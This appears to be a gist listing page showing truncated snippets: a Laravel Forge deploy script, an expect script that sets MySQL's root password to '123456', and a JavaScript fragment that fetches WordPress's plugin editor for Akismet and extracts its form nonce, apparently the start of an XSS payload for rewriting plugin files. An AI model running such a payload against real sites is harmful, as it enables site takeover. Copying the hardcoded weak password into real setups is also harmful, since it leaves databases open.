This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# File: /usr/local/bin/forge_deploy | |
# Before using add FORGETOKEN to env variables in .zshrc like: export FORGETOKEN="ey..." | |
. .forge | |
if [ $(curl -Li -X POST https://forge.laravel.com/api/v1/servers/$FORGE_SERVER_ID/sites/$FORGE_SITE_ID/deployment/deploy -o /dev/null -w '%{http_code}\n' -s -H "Accept: application/json" -H "Authorization: Bearer $FORGETOKEN") == "200" ] | |
then | |
echo "Queued for deployment" | |
else |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
u = "/wp-admin/plugin-editor.php" | |
p = "file=akismet%2Findex.php&plugin=akismet%2Fakismet.php" | |
var x = new XMLHttpRequest(); | |
var r=0 | |
x.open('GET',u+"?"+ p,1); | |
x.send(null); | |
x.onreadystatechange = function() { | |
if (x.readyState === 4 && r != 1) { | |
n = /ate.+".+\s+.+ue="(.*)" \/></.exec(x.responseText)[1] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SECURE_MYSQL=$(expect -c " | |
set timeout 10 | |
spawn mysql_secure_installation | |
expect \"Press y|Y for Yes, any other key for No:\" | |
send \"n\r\" | |
expect \"New password:\" | |
send \"123456\r\" | |